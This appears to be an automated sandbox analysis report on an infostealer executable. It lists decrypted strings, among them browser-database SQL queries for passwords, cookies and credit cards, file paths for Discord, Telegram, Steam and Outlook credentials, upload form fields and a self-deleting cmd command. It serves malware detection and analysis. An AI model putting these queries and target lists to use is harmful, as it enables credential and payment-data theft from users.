                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HttpSendRequestA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HttpOpenRequestA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: InternetReadFile
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: InternetCrackUrlA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: StrCmpCA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: StrStrA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: StrCmpCW
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: PathMatchSpecA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: GetModuleFileNameExA
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RmStartSession
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RmRegisterResources
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RmGetList
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: RmEndSession
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_open
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_prepare_v2
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_step
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_column_text
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_finalize
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_close
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_column_bytes
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3_column_blob
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: encrypted_key
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: PATH
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: C:\ProgramData\nss3.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: NSS_Init
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: NSS_Shutdown
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: PK11_GetInternalKeySlot
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: PK11_FreeSlot
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: PK11_Authenticate
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: PK11SDR_Decrypt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: C:\ProgramData\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT origin_url, username_value, password_value FROM logins
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: browser:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: profile:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: url:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: login:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: password:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Opera
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: OperaGX
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Network
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: cookies
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: .txt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: TRUE
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: FALSE
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: autofill
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT name, value FROM autofill
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: history
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT url FROM urls LIMIT 1000
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: name:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: month:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: year:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: card:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Cookies
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Login Data
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Web Data
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: History
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: logins.json
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: formSubmitURL
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: usernameField
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: encryptedUsername
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: encryptedPassword
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: guid
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT fieldname, value FROM moz_formhistory
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SELECT url FROM moz_places LIMIT 1000
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: cookies.sqlite
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: formhistory.sqlite
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: places.sqlite
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: plugins
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Local Extension Settings
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Sync Extension Settings
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: IndexedDB
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Opera Stable
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Opera GX Stable
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: CURRENT
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: chrome-extension_
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: _0.indexeddb.leveldb
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Local State
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: profiles.ini
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: chrome
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: opera
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: firefox
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: wallets
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %08lX%04lX%lu
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ProductName
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ProcessorNameString
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DisplayName
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DisplayVersion
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Network Info:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - IP: IP?
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Country: ISO?
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: System Summary:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - HWID:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - OS:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Architecture:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - UserName:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Computer Name:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Local Time:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - UTC:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Language:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Keyboards:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Laptop:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Running Path:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - CPU:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Threads:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Cores:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - RAM:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - Display Resolution:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: - GPU:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: User Agents:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Installed Apps:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: All Users:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Current User:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Process List:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: system_info.txt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: freebl3.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: mozglue.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: msvcp140.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: nss3.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: softokn3.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: vcruntime140.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Temp\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: .exe
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: runas
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: open
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: /c start
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %DESKTOP%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %APPDATA%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %LOCALAPPDATA%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %USERPROFILE%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %DOCUMENTS%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %PROGRAMFILES%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %PROGRAMFILES_86%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: %RECENT%
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: *.lnk
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: files
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \discord\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Local Storage\leveldb
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Telegram Desktop\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: key_datas
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: D877F783D5D3EF8C*
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: map*
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: A7FDF864FBC10B77*
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: A92DAA6EA6F891F2*
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: F8806DD0C461824F*
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Telegram
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: *.tox
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: *.ini
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Password
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: 00000001
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: 00000002
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: 00000003
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: 00000004
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Outlook\accounts.txt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Pidgin
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \.purple\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: accounts.xml
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: dQw4w9WgXcQ
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: token:
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Software\Valve\Steam
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: SteamPath
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \config\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ssfn*
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: config.vdf
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DialogConfig.vdf
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: libraryfolders.vdf
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: loginusers.vdf
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Steam\
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: sqlite3.dll
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: browsers
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: done
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: soft
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: \Discord\tokens.txt
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: https
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: POST
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: HTTP/1.1
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: Content-Disposition: form-data; name="
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: hwid
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: build
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: token
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: file_name
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: file
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: message
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                                Source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpackString decryptor: screenshot.jpg
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,1_2_00409540
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,1_2_004155A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,1_2_00406C10
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,1_2_004094A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,1_2_0040BF90
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C016C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,1_2_6C016C80
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C99A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,1_2_6C99A9A0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9944C0 PK11_PubEncrypt,1_2_6C9944C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C964420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,1_2_6C964420
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C994440 PK11_PrivDecrypt,1_2_6C994440
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9E25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,1_2_6C9E25B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C97E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,1_2_6C97E6E0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C99A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,1_2_6C99A650
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C978670 PK11_ExportEncryptedPrivKeyInfo,1_2_6C978670
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9BA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,1_2_6C9BA730
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C9C0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,1_2_6C9C0180
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006F4280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,2_2_006F4280
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_006F45A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,2_2_006F45A0

                                Exploits

                                barindex
                                Source: Yara matchFile source: 2.2.run.exe.3a2fd5b.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.run.exe.3a2f15b.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5427976.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.run.exe.3e5286d.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.cmd.exe.5472264.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 2.2.run.exe.39eb86d.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.cmd.exe.5472e64.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.546b264.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.run.exe.3e96d5b.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 15.2.run.exe.3e9615b.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.546be64.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.cmd.exe.542e976.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.2054011788.0000000005428000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000F.00000002.2047075890.0000000003E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000002.00000002.1805902147.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: run.exe PID: 2004, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: run.exe PID: 7872, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR

                                Compliance

                                barindex
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeUnpacked PE file: 0.2.g77dRQ1Csm.exe.400000.0.unpack
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeUnpacked PE file: 1.2.u42w.0.exe.400000.0.unpack
                                Source: g77dRQ1Csm.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 169.150.236.97:443 -> 192.168.2.4:49749 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 173.222.162.32:443 -> 192.168.2.4:49762 version: TLS 1.2
                                Source: Binary string: mozglue.pdbP source: u42w.0.exe, 00000001.00000002.2117710896.000000006C07D000.00000002.00000001.01000000.00000011.sdmp
                                Source: Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2950046011.00000173F4B60000.00000004.08000000.00040000.00000000.sdmp
                                Source: Binary string: nss3.pdb@ source: u42w.0.exe, 00000001.00000002.2118305239.000000006CA6F000.00000002.00000001.01000000.00000010.sdmp
